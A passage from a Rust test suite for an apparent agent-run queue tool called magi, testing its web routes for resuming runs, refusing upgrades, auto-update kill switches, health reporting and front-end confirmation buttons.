9519        assert_eq!(res.status, 404, "{}", res.body);
9520    }
9521
9522    #[tokio::test]
9523    async fn fold_merged_is_refused_while_a_daemon_is_working_on_the_run() {
9524        let fx = Fixture::start().await;
9525        let runs = fx.runs();
9526        let id = "20260901-000000-livemerge";
9527        write_run(&runs, id, RunStatus::Blocked);
9528
9529        let mut beat = crate::daemon::Status::new();
9530        beat.current = vec![crate::daemon::Current {
9531            task: "20260901-000000-task".to_owned(),
9532            run: id.to_owned(),
9533        }];
9534        beat.updated_at = jiff::Timestamp::now();
9535        crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
9536            .expect("publish a heartbeat");
9537
9538        let res = fx
9539            .post(
9540                &format!("/api/runs/{id}/fold-merged"),
9541                Some(r#"{"pr_url":"https://github.com/owner/repo/pull/1"}"#),
9542            )
9543            .await;
9544        assert_eq!(res.status, 409, "{}", res.body);
9545        assert!(
9546            res.json()["error"]
9547                .as_str()
9548                .unwrap()
9549                .contains("live daemon"),
9550            "correcting a run's merge underneath a running agent would race \
9551             whatever it is doing to the same `status`/`merge` fields"
9552        );
9553    }
9554
9555    /// A pull request `gh` cannot even ask about (no such remote, no such
9556    /// repository) must never be recorded as a merge on a guess - the same
9557    /// refusal `land::correct_manual_merge` gives `magi fold --merged` on the
9558    /// command line, reached here through the phone route instead.
9559    #[tokio::test]
9560    async fn fold_merged_refuses_a_pull_request_it_cannot_confirm_is_merged() {
9561        let fx = Fixture::start().await;
9562        let runs = fx.runs();
9563        let id = "20260901-000000-unconfirmed";
9564        write_run(&runs, id, RunStatus::Blocked);
9565
9566        let res = fx
9567            .post(
9568                &format!("/api/runs/{id}/fold-merged"),
9569                Some(r#"{"pr_url":"https://github.com/owner/repo/pull/1"}"#),
9570            )
9571            .await;
9572        assert_eq!(res.status, 400, "{}", res.body);
9573        assert_eq!(
9574            read_run(&runs, id).unwrap().status,
9575            RunStatus::Blocked,
9576            "a pull request that could not be confirmed merged must leave \
9577             the run exactly where it was"
9578        );
9579    }
9580
9581    #[tokio::test]
9582    async fn resume_is_refused_unless_the_run_stopped_somewhere_it_can_continue() {
9583        let fx = Fixture::start().await;
9584        let runs = fx.runs();
9585
9586        // Only a finished run and a failed one. An *interrupted* run - a
9587        // parked one, or one whose daemon was killed mid-node - is the case
9588        // resuming exists for: run 4043 sat at `reviewing` with the deck
9589        // saying it could not be resumed, which was the one state where
9590        // resuming was the only sensible answer.
9591        for (status, word) in [
9592            (RunStatus::Merged, "merged"),
9593            (RunStatus::Ready, "ready"),
9594            (RunStatus::Failed, "failed"),
9595        ] {
9596            let id = format!("20260901-000000-{}", &word[..4]);
9597            write_run(&runs, &id, status);
9598            let res = fx.post(&format!("/api/runs/{id}/resume"), None).await;
9599            assert_eq!(res.status, 409, "{word} must not be resumable");
9600            let err = res.json()["error"].as_str().unwrap().to_owned();
9601            assert!(err.contains(word), "the refusal names the status: {err}");
9602        }
9603
9604        // And an interrupted run is accepted: 202, with the resume running in
9605        // the background. `Runner::resume` fails immediately here - the
9606        // fixture's run points at a repository that does not exist - which is
9607        // the point: the handler must not wait for it to find out.
9608        let mid = "20260901-000000-midf";
9609        write_run(&runs, mid, RunStatus::Reviewing);
9610        let res = fx.post(&format!("/api/runs/{mid}/resume"), None).await;
9611        assert_eq!(res.status, 202, "an interrupted run is resumable");
9612    }
9613
9614    #[tokio::test]
9615    async fn resume_is_refused_while_the_loop_is_running() {
9616        let fx = Fixture::start().await;
9617        let runs = fx.runs();
9618        let stalled = "20260901-000000-stal";
9619        write_run(&runs, stalled, RunStatus::Stalled);
9620
9621        // The loop is busy with a *different* run, and that is still a
9622        // refusal: a manual resume must never race whatever the loop itself
9623        // is already driving, whether that is one run or several.
9624        let mut beat = crate::daemon::Status::new();
9625        beat.current = vec![crate::daemon::Current {
9626            task: "20260901-000000-task".to_owned(),
9627            run: "20260901-000000-othr".to_owned(),
9628        }];
9629        beat.updated_at = jiff::Timestamp::now();
9630        crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
9631            .expect("publish a heartbeat");
9632
9633        let res = fx.post(&format!("/api/runs/{stalled}/resume"), None).await;
9634        assert_eq!(res.status, 409);
9635        let err = res.json()["error"].as_str().unwrap().to_owned();
9636        assert!(err.contains("othr"), "it names what the loop is on: {err}");
9637        assert!(err.contains("stop it first"), "{err}");
9638    }
9639
9640    #[test]
9641    fn a_run_cannot_be_resumed_twice_at_once() {
9642        let home = TempDir::new().expect("temp home");
9643        let ui = Ui::new(
9644            Queue::at(home.path().join("queue")),
9645            Questions::at(home.path().join("questions")),
9646            Talks::at(home.path().join("talks")),
9647            home.path().join("runs"),
9648            home.path().to_path_buf(),
9649            PathBuf::from("/repo"),
9650        )
9651        .with_worktrees_root(home.path().join("wt"));
9652        let first = ui.begin_resume("20260901-000000-once").expect("claimed");
9653        let again = ui.begin_resume("20260901-000000-once");
9654        assert!(again.is_err(), "a second tap must not start a second graph");
9655        drop(first);
9656        assert!(
9657            ui.begin_resume("20260901-000000-once").is_ok(),
9658            "and the claim is released when the attempt ends"
9659        );
9660    }
9661
9662    #[test]
9663    fn talk_thinking_tracks_only_its_held_turn_claim() {
9664        let home = TempDir::new().expect("temp home");
9665        let ui = Ui::new(
9666            Queue::at(home.path().join("queue")),
9667            Questions::at(home.path().join("questions")),
9668            Talks::at(home.path().join("talks")),
9669            home.path().join("runs"),
9670            home.path().to_path_buf(),
9671            PathBuf::from("/repo"),
9672        )
9673        .with_worktrees_root(home.path().join("wt"));
9674        let id = "20260901-000000-once";
9675
9676        assert!(!ui.is_thinking(id), "an unclaimed talk is not thinking");
9677        let turn = ui.begin_talk_turn(id).expect("claim turn");
9678        assert!(ui.is_thinking(id), "the held guard is reported as thinking");
9679        assert!(
9680            !ui.is_thinking("20260901-000000-other"),
9681            "one talk's turn does not make another talk busy"
9682        );
9683        drop(turn);
9684        assert!(!ui.is_thinking(id), "dropping the guard releases thinking");
9685    }
9686
9687    #[tokio::test]
9688    async fn an_upgrade_is_refused_when_the_loop_belongs_to_another_process() {
9689        let fx = Fixture::start().await;
9690        // Somebody else's `magi serve` owns the queue. Replacing this binary
9691        // would leave that process running an old one against the same
9692        // claims, which is worse than refusing.
9693        let mut beat = crate::daemon::Status::new();
9694        beat.pid = 4321;
9695        beat.updated_at = jiff::Timestamp::now();
9696        crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
9697            .expect("publish a heartbeat");
9698
9699        let res = fx.post("/api/upgrade", None).await;
9700        assert_eq!(res.status, 409);
9701        let err = res.json()["error"].as_str().unwrap().to_owned();
9702        assert!(err.contains("4321"), "the refusal names the owner: {err}");
9703        assert!(err.contains("old one against the same queue"), "{err}");
9704    }
9705
9706    /// [`should_spawn_recheck`] must refuse for the same two reasons
9707    /// [`Checker::new`](crate::updater::Checker::new) and `upgrade_post`
9708    /// already do: `mode = "off"` and the `MAGI_NO_AUTOUPDATE` kill switch.
9709    /// Purely a predicate over config and the environment - no network, no
9710    /// disk, no runtime - so unlike the fixture-based tests around it this
9711    /// one needs neither.
9712    #[test]
9713    fn recheck_never_spawns_when_checking_is_off_or_killed_by_env() {
9714        assert!(!should_spawn_recheck(&crate::config::Update {
9715            mode: UpdateMode::Off,
9716            interval: None,
9717        }));
9718
9719        // SAFETY: single-threaded as far as this variable goes, the same
9720        // reasoning `updater::tests::env_kill_switch_semantics` relies on.
9721        unsafe {
9722            std::env::set_var(crate::updater::NO_AUTOUPDATE_ENV, "1");
9723        }
9724        let killed = should_spawn_recheck(&crate::config::Update {
9725            mode: UpdateMode::Notify,
9726            interval: None,
9727        });
9728        unsafe {
9729            std::env::remove_var(crate::updater::NO_AUTOUPDATE_ENV);
9730        }
9731        assert!(
9732            !killed,
9733            "MAGI_NO_AUTOUPDATE must stop the periodic recheck, not just the \
9734             one-time startup check"
9735        );
9736
9737        assert!(should_spawn_recheck(&crate::config::Update {
9738            mode: UpdateMode::Notify,
9739            interval: None,
9740        }));
9741    }
9742
9743    /// [`recheck_poll_period`] must track a configured `[update] interval`
9744    /// shorter than its own default ceiling - a fixed sleep here would leave
9745    /// an operator's short interval waiting on the next wake-up instead of on
9746    /// `should_check`, which is the same bug this whole task exists to fix,
9747    /// just one level down.
9748    #[test]
9749    fn recheck_poll_period_tracks_a_short_configured_interval() {
9750        let short = crate::config::Update {
9751            mode: UpdateMode::Notify,
9752            interval: Some("1m".to_owned()),
9753        };
9754        let period = recheck_poll_period(&short);
9755        assert!(
9756            period <= Duration::from_secs(30),
9757            "a one-minute interval must wake the task far sooner than the \
9758             default ceiling, or the deck would not notice within the \
9759             interval the operator configured: got {period:?}"
9760        );
9761
9762        let default = crate::config::Update {
9763            mode: UpdateMode::Notify,
9764            interval: None,
9765        };
9766        assert_eq!(
9767            recheck_poll_period(&default),
9768            UPDATE_RECHECK_POLL_MAX,
9769            "the default day-long interval should poll at the (capped) \
9770             ceiling rather than needlessly often"
9771        );
9772    }
9773
9774    /// [`update_recheck_due`] must not repeat a check made moments ago, the
9775    /// same throttle `updater::Checker::should_check` already gives the
9776    /// CLI's notify mode. Built over an explicit state file via
9777    /// `Checker::for_test`, never `Checker::new`, so this cannot read or
9778    /// write the operator's real `last_update_check.json` - and therefore
9779    /// cannot flake on whatever that file happens to say on the machine
9780    /// running the test.
9781    #[test]
9782    fn recheck_skips_the_network_before_the_interval_elapses() {
9783        let dir = TempDir::new().expect("temp dir");
9784        let path = dir.path().join("state.json");
9785        let state = kaishin::UpdateCheckState {
9786            last_checked_unix: jiff::Timestamp::now().as_second() as u64,
9787            last_known_latest: None,
9788            last_known_url: None,
9789        };
9790        kaishin::save_check_state(&path, &state).expect("seed a just-checked state");
9791
9792        let checker = crate::updater::Checker::for_test(Duration::from_secs(24 * 60 * 60), path);
9793        assert!(
9794            !update_recheck_due(&checker, None),
9795            "a check made moments ago must not be repeated before the \
9796             configured interval elapses"
9797        );
9798    }
9799
9800    /// An upgrade this deck already started must not be raced by a recheck
9801    /// that discovers a newer release mid-install - regardless of what
9802    /// `should_check` says, which is why the state file here is missing
9803    /// entirely: read alone, that alone would answer "never checked, go
9804    /// ahead".
9805    #[test]
9806    fn recheck_defers_to_an_upgrade_already_in_flight() {
9807        let dir = TempDir::new().expect("temp dir");
9808        let path = dir.path().join("state.json");
9809        let checker = crate::updater::Checker::for_test(Duration::from_secs(60 * 60), path);
9810        let progress = crate::updater::Progress::new("0.8.0".to_owned(), "v0.9.0".to_owned());
9811
9812        assert!(
9813            !update_recheck_due(&checker, Some(&progress)),
9814            "a recheck must not run while an upgrade this deck started is \
9815             still moving"
9816        );
9817    }
9818
9819    #[tokio::test]
9820    async fn an_upgrade_is_refused_by_the_no_autoupdate_kill_switch() {
9821        // The same env var the background check honours (`disabled_by_env`)
9822        // must also stop a button press before it ever calls
9823        // `Checker::newer_release` - an operator who set `MAGI_NO_AUTOUPDATE`
9824        // means "never contact GitHub from this process", and a tap on the
9825        // upgrade button must not override that any more than a broken
9826        // `magi.toml` may. Left unset, this fixture's default config would
9827        // otherwise reach a real, unauthenticated GitHub call.
9828        //
9829        // SAFETY: single-threaded as far as this variable goes - nothing else
9830        // in this binary reads `MAGI_NO_AUTOUPDATE` concurrently, the same
9831        // reasoning `updater::tests::env_kill_switch_semantics` relies on.
9832        unsafe {
9833            std::env::set_var(crate::updater::NO_AUTOUPDATE_ENV, "1");
9834        }
9835        let fx = Fixture::start().await;
9836        let res = fx.post("/api/upgrade", None).await;
9837        unsafe {
9838            std::env::remove_var(crate::updater::NO_AUTOUPDATE_ENV);
9839        }
9840        assert_eq!(res.status, 200, "not 202: nothing was set in motion");
9841        let body = res.json();
9842        assert!(body["to"].is_null(), "there was no release to move to");
9843        assert!(body["parked"].is_null(), "and nothing was parked");
9844        assert!(
9845            body["detail"]
9846                .as_str()
9847                .unwrap()
9848                .contains("disabled by MAGI_NO_AUTOUPDATE"),
9849            "{body:?}"
9850        );
9851    }
9852
9853    #[tokio::test]
9854    async fn an_upgrade_with_nothing_to_install_changes_nothing() {
9855        // `[update] mode = "off"` so `updater::Checker::new` returns `None`
9856        // and the route answers from its own logic.
9857        //
9858        // This test used to lean on the fixture's placeholder repo failing
9859        // config discovery, which left `mode = "notify"` - and a live,
9860        // unauthenticated call to the GitHub releases API inside a unit test.
9861        // GitHub allows 60 of those an hour per address, so the suite went red
9862        // on `macos-latest` and nowhere else, in bursts, and stayed red for as
9863        // long as somebody kept re-running it: every attempt spent another
9864        // request. Six reruns across four pull requests were charged to that
9865        // before it was read as a rate limit rather than a flake.
9866        //
9867        // What the assertion is about is the "already current" branch, which
9868        // is reached by there being no newer release *or* nowhere to look. The
9869        // second one needs no network and cannot be rate limited.
9870        let repo = TempDir::new().expect("repo dir");
9871        std::fs::write(repo.path().join("magi.toml"), "[update]\nmode = \"off\"\n")
9872            .expect("write magi.toml");
9873        let fx = Fixture::with_repo(repo.path().to_path_buf()).await;
9874
9875        // It must answer 200 and leave the process alone: restarting for an
9876        // upgrade that did not happen parks the run in flight and drops every
9877        // connection to pay for nothing. A probe against a deck already on the
9878        // newest build did exactly that, which is how this case got its own
9879        // branch.
9880        let res = fx.post("/api/upgrade", None).await;
9881        assert_eq!(res.status, 200, "not 202: nothing was set in motion");
9882        let body = res.json();
9883        assert!(body["to"].is_null(), "there was no release to move to");
9884        assert!(body["parked"].is_null(), "and nothing was parked");
9885        assert!(
9886            body["detail"]
9887                .as_str()
9888                .unwrap()
9889                .contains("nothing restarted"),
9890            "{body:?}"
9891        );
9892    }
9893
9894    #[tokio::test]
9895    async fn health_reports_the_running_version_and_no_pending_upgrade_by_default() {
9896        // `mode = "off"` for the same reason as the test above: a default
9897        // fixture repo falls back to `mode = "notify"`, which would make this
9898        // route's new `update` field a live, unauthenticated GitHub call on
9899        // every assertion in this suite that happens to hit `/api/health`.
9900        let repo = TempDir::new().expect("repo dir");
9901        std::fs::write(repo.path().join("magi.toml"), "[update]\nmode = \"off\"\n")
9902            .expect("write magi.toml");
9903        let fx = Fixture::with_repo(repo.path().to_path_buf()).await;
9904
9905        let health = fx.get("/api/health").await.json();
9906        assert_eq!(health["version"], env!("CARGO_PKG_VERSION"));
9907        assert_eq!(
9908            health["update"]["available"], false,
9909            "checking is off, which reads as \"unknown\", not \"none\""
9910        );
9911        assert!(health["update"]["to"].is_null());
9912        assert!(
9913            health["upgrade"].is_null(),
9914            "nothing has ever asked this deck to upgrade"
9915        );
9916    }
9917
9918    #[tokio::test]
9919    async fn health_reports_a_parked_upgrade_and_what_it_is_waiting_on() {
9920        let fx = Fixture::start().await;
9921        write_run(&fx.runs(), "20260905-000000-cd51", RunStatus::Implementing);
9922
9923        let mut progress = crate::updater::Progress::new("0.5.1".to_owned(), "0.5.2".to_owned());
9924        progress.parked_run = Some("20260905-000000-cd51".to_owned());
9925        progress.advance(crate::updater::Stage::Parking);
9926        crate::updater::write_progress(fx.home.path(), &progress).expect("write upgrade.json");
9927
9928        let health = fx.get("/api/health").await.json();
9929        assert_eq!(health["upgrade"]["stage"], "parking");
9930        assert_eq!(health["upgrade"]["from"], "0.5.1");
9931        assert_eq!(health["upgrade"]["to"], "0.5.2");
9932        let waiting_on = health["upgrade"]["waiting_on"]
9933            .as_str()
9934            .expect("waiting_on is set while parking a known run");
9935        assert!(waiting_on.contains("cd51"), "{waiting_on}");
9936        assert!(waiting_on.contains("implementing"), "{waiting_on}");
9937    }
9938
9939    #[tokio::test]
9940    async fn health_reports_a_finished_upgrade_with_no_waiting_on() {
9941        let fx = Fixture::start().await;
9942        let mut progress = crate::updater::Progress::new("0.5.1".to_owned(), "0.5.2".to_owned());
9943        progress.advance(crate::updater::Stage::Done);
9944        crate::updater::write_progress(fx.home.path(), &progress).expect("write upgrade.json");
9945
9946        let health = fx.get("/api/health").await.json();
9947        assert_eq!(health["upgrade"]["stage"], "done");
9948        assert!(
9949            health["upgrade"]["waiting_on"].is_null(),
9950            "nothing to wait on once it is done"
9951        );
9952    }
9953
9954    #[tokio::test]
9955    async fn hand_over_advances_the_upgrade_progress_through_parking_and_restarting() {
9956        let home = TempDir::new().expect("temp home");
9957        let runs = home.path().join("runs");
9958        std::fs::create_dir_all(&runs).expect("runs dir");
9959        let ui = Ui::new(
9960            Queue::at(home.path().join("queue")),
9961            Questions::at(home.path().join("questions")),
9962            Talks::at(home.path().join("talks")),
9963            runs,
9964            home.path().to_path_buf(),
9965            PathBuf::from("/repo/magi"),
9966        )
9967        .with_launch(launch_idle);
9968        let looping = ui.looping();
9969        let listener = tokio::net::TcpListener::bind((Ipv4Addr::LOCALHOST, 0))
9970            .await
9971            .expect("bind loopback");
9972        let served = tokio::spawn(axum::serve(listener, ui.router()).into_future());
9973
9974        let progress = crate::updater::Progress::new("0.5.1".to_owned(), "0.5.2".to_owned());
9975        crate::updater::write_progress(home.path(), &progress).expect("seed progress");
9976
9977        hand_over(home.path(), &looping, served, || Ok(()))
9978            .await
9979            .expect("hand over");
9980
9981        let after = crate::updater::read_progress(home.path()).expect("progress on disk");
9982        assert_eq!(
9983            after.stage,
9984            crate::updater::Stage::Restarting,
9985            "hand_over owns the record through parking and up to restarting; \
9986             the successor is what finishes it"
9987        );
9988    }
9989
9990    #[test]
9991    fn the_upgrade_button_arms_before_it_restarts_anything() {
9992        // It ends the process the operator is talking to, and a phone in a
9993        // pocket taps things. One tap arms, the second commits.
9994        assert!(APP_JS.contains("upgrade: \"/api/upgrade\""));
9995        assert!(APP_JS.contains("Replace the binary and restart?"));
9996        assert!(APP_JS.contains("function confirmed("));
9997        // Hidden when the loop is somebody else's, matching the 409 above -
9998        // and hidden with nothing to install, matching the 200 "already
9999        // current" branch: an operator on the newest build must not be
10000        // offered a restart that would only park a run for nothing.
10001        assert!(APP_JS.contains("show(upgradeBtn, !foreign && update.available)"));
10002        // A park waits for the node in flight, up to an hour for an implement
10003        // wave. Leaving the button reading "Upgrading…" for that long is the
10004        // same mistake as an error rendered off screen: it looks wedged.
10005        assert!(
10006            APP_JS.contains("Parking, then restarting"),
10007            "the button says what it is waiting for"
10008        );
10009        // And nothing to install must give the button back rather than
10010        // pretending a restart is coming.
10011        assert!(APP_JS.contains("if (!out.to)"));
10012    }
10013
10014    #[test]
10015    fn stopping_the_loop_arms_but_starting_does_not() {
10016        // A stray tap must not leave the queue stopped overnight, so a stop is
10017        // two taps through the same helper the upgrade uses; a start stays one.
10018        assert!(APP_JS.contains("Finish the run(s) in flight, then stop claiming?"));
10019        assert!(APP_JS.contains("Stop claiming new tasks? Nothing is in flight."));
10020        assert!(APP_JS.contains("confirmed(button, question)"));
10021        // The label put back on timeout is the one saved when arming, not a
10022        // hard-coded upgrade caption that would rename the stop button.
10023        assert!(!APP_JS.contains("setText(btn, \"Update & restart\");\n    }\n  }, 6000)"));
10024        assert!(APP_JS.contains("const label = btn.textContent;"));
10025        assert!(!APP_JS.contains("Neither direction is guarded"));
10026    }
10027
10028    #[test]
10029    fn the_running_version_is_shown_regardless_of_whether_an_update_exists() {
10030        assert!(
10031            APP_JS.contains("state.health.version"),
10032            "the operator wants to know what is running even with nothing newer"
10033        );
10034        assert!(APP_JS.contains("id=\"daemon-version\"") || APP_CSS.contains(".daemon-version"));
10035    }
10036
10037    #[test]
10038    fn the_upgrade_button_names_its_destination() {
10039        assert!(
10040            APP_JS.contains("`Update to ${update.to}`"),
10041            "pressing the button should not be a surprise about what it moves to"
10042        );
10043    }
10044
10045    #[test]
10046    fn an_upgrade_in_progress_is_shown_as_stages_not_as_an_error() {
10047        for stage in ["downloading", "replaced", "parking", "restarting"] {
10048            assert!(
10049                APP_JS.contains(&format!("\"{stage}\"")),
10050                "the phone must be able to tell {stage} apart from the others"
10051            );
10052        }
10053        assert!(APP_JS.contains(".waiting_on"));
10054        // What replaced the bare "Cannot reach magi: Failed to fetch": a
10055        // fetch failing while an upgrade is in flight is not an error, it is
10056        // the sub-second gap `bind_waiting` covers, and it must not be
10057        // reported as one.
10058        assert!(APP_JS.contains("function reportUnreachableDuringUpgrade("));
10059        assert!(APP_JS.contains("reconnects on its own"));
10060    }
10061
10062    #[test]
10063    fn a_failed_upgrade_does_not_lock_the_loop_controls() {
10064        // `Stage::Failed` is terminal on the server and nothing clears it on
10065        // its own - not a fresh start, not time passing - so a full-strip
10066        // takeover for it (the way the busy stages take the strip over,
10067        // correctly, because those are transient) would have hidden
10068        // start/stop/park behind an upgrade notice with no way back short of
10069        // a person editing `upgrade.json` by hand or a later release
10070        // happening to succeed. The failure must instead ride along as a note
10071        // next to whatever control the loop's own state already offers.
10072        let body = &APP_JS[APP_JS.find("function renderLoop(").expect("renderLoop")
10073            ..APP_JS.find("function upgrade(").expect("upgrade")];
10074        assert!(
10075            !body.contains(
10076                "upgradeStage === \"failed\") {\n    setAttr(box, \"data-state\", \"failed\")"
10077            ),
10078            "a failed upgrade must not take the whole strip over the way it used to"
10079        );
10080        assert!(
10081            body.contains("upgradeFailNote"),
10082            "the failure has to reach the loop's own note instead"
10083        );
10084        // `quiet` and `control` are the only two places `loop-why` is set from
10085        // this function's own state; both must carry the note through, or a
10086        // future edit to either one would silently drop it again.
10087        assert_eq!(
10088            body.matches("upgradeFailNote].filter(Boolean).join")
10089                .count(),
10090            2,
10091            "both loop-why writers (quiet and control) must fold the note in"
10092        );
10093    }
10094
10095    #[test]
10096    fn an_overdue_upgrade_eventually_asks_for_a_human() {
10097        // The ceiling has to clear a full hour-long park with room to spare,
10098        // or an ordinary implement wave would be reported as a stuck upgrade.
10099        assert!(APP_JS.contains("UPGRADE_WAIT_LIMIT_MS = 70 * 60 * 1000"));
10100        assert!(APP_JS.contains("function upgradeOverdue("));
10101    }
10102
10103    #[test]
10104    fn coming_back_from_an_upgrade_says_which_version_it_landed_on() {
10105        assert!(
10106            APP_JS.contains("Updated to ${upgradeInfo.to"),
10107            "the operator who asked for the restart wants to know it worked"
10108        );
10109    }
10110
10111    #[test]
10112    fn an_error_is_visible_from_where_the_button_is() {
10113        // The alert used to sit in the flow under the header. On a phone
10114        // scrolled 13 500 px down to a run's action sheet that is off screen,
10115        // so tapping Resume and being told "the loop is running run b455
10116        // right now" looked exactly like a button that did nothing.
10117        let alert = &APP_CSS[APP_CSS.find(".alert {").expect(".alert")
10118            ..APP_CSS.find(".alert-text").expect(".alert-text")];
10119        assert!(
10120            alert.contains("position: fixed"),
10121            "an error about the thing under your thumb has to be visible from \
10122             where your thumb is: {alert}"
10123        );
10124        assert!(
10125            alert.contains("z-index: 25"),
10126            "above the dock (20) and the run-actions FAB (15), so neither \
10127             buries it: {alert}"
10128        );
10129        assert!(
10130            alert.contains("var(--tap)"),
10131            "and clear of the dock and the home indicator: {alert}"
10132        );
10133        // The FAB sits at the same height on the right. An error that covered
10134        // it would hide the button the operator reaches for next.
10135        assert!(
10136            alert.contains("var(--s4) + var(--tap) + var(--s3)"),
10137            "the FAB's column stays free: {alert}"
10138        );
10139    }
10140
10141    #[tokio::test]
10142    async fn an_older_attempt_says_what_replaced_it() {
10143        let fx = Fixture::start().await;
10144        let q = fx.queue();
10145        let runs = fx.runs();
10146        let (first, second) = ("20260901-000000-aaaa", "20260901-000000-bbbb");
10147        write_run(&runs, first, RunStatus::Stalled);
10148        write_run(&runs, second, RunStatus::Blocked);
10149
10150        let mut t = Task::new(
10151            "one task".to_owned(),
10152            "do it".to_owned(),
10153            PathBuf::from("/repo"),
10154            Source::Human,
10155        );
10156        t.runs = vec![first.to_owned(), second.to_owned()];
10157        q.put(&mut t).expect("put");
10158
10159        // Two cards with the same title and no hint which is which was the
10160        // question: "why are there two of the same, one stalled and one
10161        // blocked?" The older one now names its replacement.
10162        let rows = fx.get("/api/runs").await.json();
10163        let by = |short: &str| -> Value {
10164            rows.as_array()
10165                .unwrap()
10166                .iter()
10167                .find(|r| r["short"] == short)
10168                .cloned()
10169                .unwrap_or(Value::Null)
10170        };
10171        assert_eq!(by("aaaa")["superseded_by"], "bbbb");
10172        assert!(
10173            by("bbbb")["superseded_by"].is_null(),
10174            "the latest attempt is not superseded by anything"
10175        );
10176        // Front end: the note has to be rendered, not just carried.
10177        assert!(APP_JS.contains("run.superseded_by"));
10178        assert!(APP_JS.contains("Superseded by"));
10179    }
10180
10181    #[tokio::test]
10182    async fn a_run_s_own_detail_page_says_what_replaced_it_too() {
10183        // The list route has known this since the card fix above; the detail
10184        // route — what an operator actually opens from a notification about
10185        // a blocked run — did not, and went on showing a bare red BLOCKED
10186        // chip for a run a retry had already finished.
10187        let fx = Fixture::start().await;
10188        let q = fx.queue();
10189        let runs = fx.runs();
10190        let (first, second) = ("20260901-000000-cccc", "20260901-000000-dddd");
10191        write_run(&runs, first, RunStatus::Blocked);
10192        write_run(&runs, second, RunStatus::Merged);
10193
10194        let mut t = Task::new(
10195            "one task".to_owned(),
10196            "do it".to_owned(),
10197            PathBuf::from("/repo"),
10198            Source::Human,
10199        );
10200        t.runs = vec![first.to_owned(), second.to_owned()];
10201        q.put(&mut t).expect("put");
10202
10203        let earlier = fx.get(&format!("/api/runs/{first}")).await.json();
10204        assert_eq!(earlier["superseded_by"], "dddd");
10205        assert_eq!(earlier["latest_attempt"]["id"], second);
10206        assert_eq!(earlier["latest_attempt"]["short"], "dddd");
10207        assert_eq!(
10208            earlier["latest_attempt"]["resolved"], true,
10209            "the run that replaced it landed, so this one reads as settled"
10210        );
10211
10212        let later = fx.get(&format!("/api/runs/{second}")).await.json();
10213        assert!(
10214            later["superseded_by"].is_null(),
10215            "the latest attempt is not superseded by anything"
10216        );
10217        assert!(
10218            later["latest_attempt"].is_null(),
10219            "the latest attempt has no later attempt of its own"
10220        );
10221
10222        // Front end: the detail page has to read the field this route now
10223        // carries, downgrade the chip, and link to the run that replaced it —
10224        // not just repeat the list card's own logic under a different name.
10225        // The link is built off `latest_attempt.id`, the server-resolved
10226        // full id, never a bare short string a client would have to guess a
10227        // full run from.
10228        assert!(APP_JS.contains("run.latest_attempt"));
10229        assert!(APP_JS.contains("data-superseded"));
10230        assert!(APP_JS.contains("#/runs/${latest.id}"));
10231    }
10232
10233    #[tokio::test]
10234    async fn a_chain_of_retries_points_the_oldest_at_the_current_head() {
10235        // A -> B -> C, all Blocked except the last. A's immediate successor
10236        // (superseded_by) is B, which is itself unresolved; what an operator
10237        // opening A's page actually needs is where the task's story stands
10238        // *now* - C, not B - without depending on whether C happens to be in
10239        // whatever page of /api/runs the client last cached.
10240        let fx = Fixture::start().await;
10241        let q = fx.queue();
10242        let runs = fx.runs();
10243        let (a, b, c) = (
10244            "20260901-000000-aaaa",
10245            "20260901-000000-bbbb",
10246            "20260901-000000-cccc",
10247        );
10248        write_run(&runs, a, RunStatus::Blocked);
10249        write_run(&runs, b, RunStatus::Blocked);
10250        write_run(&runs, c, RunStatus::Merged);
10251
10252        let mut t = Task::new(
10253            "retried twice".to_owned(),
10254            "do it".to_owned(),
10255            PathBuf::from("/repo"),
10256            Source::Human,
10257        );
10258        t.runs = vec![a.to_owned(), b.to_owned(), c.to_owned()];
10259        q.put(&mut t).expect("put");
10260
10261        let view = fx.get(&format!("/api/runs/{a}")).await.json();
10262        assert_eq!(view["superseded_by"], "bbbb", "the immediate successor");
10263        assert_eq!(
10264            view["latest_attempt"]["id"], c,
10265            "the chain's current head, not the intermediate Blocked retry"
10266        );
10267        assert_eq!(view["latest_attempt"]["resolved"], true);
10268
10269        let mid = fx.get(&format!("/api/runs/{b}")).await.json();
10270        assert_eq!(mid["latest_attempt"]["id"], c);
10271        assert_eq!(mid["latest_attempt"]["resolved"], true);
10272    }
10273
10274    #[tokio::test]
10275    async fn an_unresolved_or_unverified_successor_does_not_read_as_finished() {
10276        let fx = Fixture::start().await;
10277        let q = fx.queue();
10278        let runs = fx.runs();
10279
10280        // Still Blocked: the task is not resolved, so the older run must not
10281        // read as settled either.
10282        let (still_blocked_a, still_blocked_b) = ("20260901-000000-e001", "20260901-000000-e002");
10283        write_run(&runs, still_blocked_a, RunStatus::Blocked);
10284        write_run(&runs, still_blocked_b, RunStatus::Blocked);
10285        let mut t1 = Task::new(
10286            "still stuck".to_owned(),
10287            "do it".to_owned(),
10288            PathBuf::from("/repo"),
10289            Source::Human,
10290        );
10291        t1.runs = vec![still_blocked_a.to_owned(), still_blocked_b.to_owned()];
10292        q.put(&mut t1).expect("put");
10293        let view1 = fx.get(&format!("/api/runs/{still_blocked_a}")).await.json();
10294        assert_eq!(view1["latest_attempt"]["resolved"], false);
10295
10296        // VerifiedNoop: a candidate's own unconfirmed claim, held for a human
10297        // to check - not a confirmed finish, so this must not read as
10298        // resolved either, even though the run is done in the sense that
10299        // nothing is still running.
10300        let (noop_a, noop_b) = ("20260901-000000-e003", "20260901-000000-e004");
10301        write_run(&runs, noop_a, RunStatus::Blocked);
10302        write_run(&runs, noop_b, RunStatus::VerifiedNoop);
10303        let mut t2 = Task::new(
10304            "claims done".to_owned(),
10305            "do it".to_owned(),
10306            PathBuf::from("/repo"),
10307            Source::Human,
10308        );
10309        t2.runs = vec![noop_a.to_owned(), noop_b.to_owned()];
10310        q.put(&mut t2).expect("put");
10311        let view2 = fx.get(&format!("/api/runs/{noop_a}")).await.json();
10312        assert_eq!(
10313            view2["latest_attempt"]["resolved"], false,
10314            "an unverified no-op claim must not read as a confirmed finish"
10315        );
10316
10317        // Front end: an unresolved successor must not carry the "finished
10318        // this work" note or the muted chip treatment.
10319        assert!(APP_JS.contains("latest.resolved"));
10320    }
10321
10322    #[tokio::test]
10323    async fn a_replaced_deck_is_not_served_from_a_phone_s_cache() {
10324        let fx = Fixture::start().await;
10325        // No cache header at all meant browsers invented their own policy,
10326        // and one did: a phone went on showing "Candidates must be folded
10327        // before deleting. Run `magi fold` first." - deleted two releases
10328        // earlier - from a deck that no longer contained the sentence. The
